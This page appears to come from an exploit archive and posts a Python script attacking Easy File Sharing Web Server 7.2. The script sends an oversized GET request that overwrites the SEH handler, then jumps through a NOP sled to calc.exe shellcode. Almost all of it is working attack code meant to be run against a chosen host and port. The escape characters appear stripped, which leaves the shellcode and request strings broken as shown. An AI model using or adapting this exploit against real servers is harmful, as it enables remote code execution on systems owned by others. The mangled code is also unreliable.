Easy File Sharing Web Server 7.2 GET SEH Buffer Overflow

Posted on 18 December 2015

# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
# Date: 12/2/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port

import socket
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

a = socket.socket()

print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))

entire=4500

# Junk
buff = "A"*4061

# Next SEH
buff+= "xebx0Ax90x90"

# pop pop ret
buff+= "x98x97x01x10"

buff+= "x90"*19

# calc.exe
# Bad Characters: x20 x2f x5c
shellcode = (
"xd9xcbxbexb9x23x67x31xd9x74x24xf4x5ax29xc9"
"xb1x13x31x72x19x83xc2x04x03x72x15x5bxd6x56"
"xe3xc9x71xfax62x81xe2x75x82x0bxb3xe1xc0xd9"
"x0bx61xa0x11xe7x03x41x84x7cxdbxd2xa8x9ax97"
"xbax68x10xfbx5bxe8xadx70x7bx28xb3x86x08x64"
"xacx52x0ex8dxddx2dx3cx3cxa0xfcxbcx82x23xa8"
"xd7x94x6ex23xd9xe3x05xd4x05xf2x1bxe9x09x5a"
"x1cx39xbd"
)
buff+= shellcode

buff+= "x90"*7

buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)

# ======== GET ========
a.send("GET " + buff + " HTTP/1.0

")

a.close()

print "Done..."

TOP

Malware :

None in database

Last 20

Exploits :

Last 20